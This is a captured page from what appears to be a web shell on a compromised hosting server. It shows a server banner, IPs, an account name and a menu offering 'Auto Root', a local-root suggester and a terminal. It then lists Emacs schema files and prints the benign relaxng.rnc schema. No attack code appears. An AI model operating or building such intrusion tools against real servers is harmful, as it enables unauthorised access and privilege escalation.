Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
emacs /
24.3 /
etc /
schema /
Delete
Unzip
Name
Size
Permission
Date
Action
README
5.03
KB
-rw-r--r--
2012-04-13 21:33
calstbl.rnc
7.23
KB
-rw-r--r--
2012-04-13 21:33
dbcalstbl.rnc
762
B
-rw-r--r--
2012-04-13 21:33
dbhier.rnc
38.46
KB
-rw-r--r--
2012-04-13 21:33
dbnotn.rnc
2.54
KB
-rw-r--r--
2012-04-13 21:33
dbpool.rnc
139
KB
-rw-r--r--
2012-04-13 21:33
dbstart.rnc
353
B
-rw-r--r--
2012-04-13 21:33
docbook.rnc
1.76
KB
-rw-r--r--
2012-04-13 21:33
locate.rnc
6.63
KB
-rw-r--r--
2013-01-01 15:37
rdfxml.rnc
6.13
KB
-rw-r--r--
2012-04-13 21:33
relaxng.rnc
2.78
KB
-rw-r--r--
2013-01-01 15:37
schemas.xml
2.39
KB
-rw-r--r--
2013-01-01 15:37
xhtml-applet.rnc
441
B
-rw-r--r--
2012-04-13 21:33
xhtml-attribs.rnc
457
B
-rw-r--r--
2012-04-13 21:33
xhtml-base.rnc
121
B
-rw-r--r--
2012-04-13 21:33
xhtml-bdo.rnc
216
B
-rw-r--r--
2012-04-13 21:33
xhtml-bform.rnc
1.62
KB
-rw-r--r--
2012-04-13 21:33
xhtml-btable.rnc
975
B
-rw-r--r--
2012-04-13 21:33
xhtml-csismap.rnc
817
B
-rw-r--r--
2012-04-13 21:33
xhtml-datatypes.rnc
1.44
KB
-rw-r--r--
2012-04-13 21:33
xhtml-edit.rnc
333
B
-rw-r--r--
2012-04-13 21:33
xhtml-events.rnc
1.62
KB
-rw-r--r--
2012-04-13 21:33
xhtml-form.rnc
1.62
KB
-rw-r--r--
2012-04-13 21:33
xhtml-frames.rnc
774
B
-rw-r--r--
2012-04-13 21:33
xhtml-hypertext.rnc
479
B
-rw-r--r--
2012-04-13 21:33
xhtml-iframe.rnc
465
B
-rw-r--r--
2012-04-13 21:33
xhtml-image.rnc
290
B
-rw-r--r--
2012-04-13 21:33
xhtml-inlstyle.rnc
64
B
-rw-r--r--
2012-04-13 21:33
xhtml-legacy.rnc
3.46
KB
-rw-r--r--
2012-04-13 21:33
xhtml-link.rnc
402
B
-rw-r--r--
2012-04-13 21:33
xhtml-lst.rnc
475
B
-rw-r--r--
2012-04-13 21:33
xhtml-meta.rnc
250
B
-rw-r--r--
2012-04-13 21:33
xhtml-nameident.rnc
272
B
-rw-r--r--
2012-04-13 21:33
xhtml-object.rnc
675
B
-rw-r--r--
2012-04-13 21:33
xhtml-param.rnc
238
B
-rw-r--r--
2012-04-13 21:33
xhtml-pres.rnc
649
B
-rw-r--r--
2012-04-13 21:33
xhtml-ruby.rnc
539
B
-rw-r--r--
2012-04-13 21:33
xhtml-script.rnc
483
B
-rw-r--r--
2012-04-13 21:33
xhtml-ssismap.rnc
104
B
-rw-r--r--
2012-04-13 21:33
xhtml-struct.rnc
513
B
-rw-r--r--
2012-04-13 21:33
xhtml-table.rnc
1.88
KB
-rw-r--r--
2012-04-13 21:33
xhtml-text.rnc
2.31
KB
-rw-r--r--
2012-04-13 21:33
xhtml-tgt.rnc
206
B
-rw-r--r--
2012-04-13 21:33
xhtml-xstyle.rnc
256
B
-rw-r--r--
2012-04-13 21:33
xhtml.rnc
954
B
-rw-r--r--
2012-04-13 21:33
xslt.rnc
10.38
KB
-rw-r--r--
2012-04-13 21:33
Save
Rename
# RELAX NG XML syntax expressed in RELAX NG Compact syntax. # Copyright (C) 2003-2004, 2007-2013 Free Software Foundation, Inc. # This file is part of GNU Emacs. # GNU Emacs is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # GNU Emacs is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with GNU Emacs. If not, see <http://www.gnu.org/licenses/>. default namespace rng = "http://relaxng.org/ns/structure/1.0" namespace local = "" datatypes xsd = "http://www.w3.org/2001/XMLSchema-datatypes" start = pattern pattern = element element { (nameQName | nameClass), (common & pattern+) } | element attribute { (nameQName | nameClass), (common & pattern?) } | element group|interleave|choice|optional |zeroOrMore|oneOrMore|list|mixed { common & pattern+ } | element ref|parentRef { nameNCName, common } | element empty|notAllowed|text { common } | element data { type, param*, (common & exceptPattern?) } | element value { commonAttributes, type?, xsd:string } | element externalRef { href, common } | element grammar { common & grammarContent* } param = element param { commonAttributes, nameNCName, xsd:string } exceptPattern = element except { common & pattern+ } grammarContent = definition | element div { common & grammarContent* } | element include { href, (common & includeContent*) } includeContent = definition | element div { common & includeContent* } definition = element start { combine?, (common & pattern+) } | element define { nameNCName, combine?, (common & pattern+) } combine = attribute combine { "choice" | "interleave" } nameClass = element name { commonAttributes, xsd:QName } | element anyName { common & exceptNameClass? } | element nsName { common & exceptNameClass? } | element choice { common & nameClass+ } exceptNameClass = element except { common & nameClass+ } nameQName = attribute name { xsd:QName } nameNCName = attribute name { xsd:NCName } href = attribute href { xsd:anyURI } type = attribute type { xsd:NCName } common = commonAttributes, foreignElement* commonAttributes = attribute ns { xsd:string }?, attribute datatypeLibrary { xsd:anyURI }?, foreignAttribute* foreignElement = element * - rng:* { (anyAttribute | text | anyElement)* } foreignAttribute = attribute * - (rng:*|local:*) { text } anyElement = element * { (anyAttribute | text | anyElement)* } anyAttribute = attribute * { text }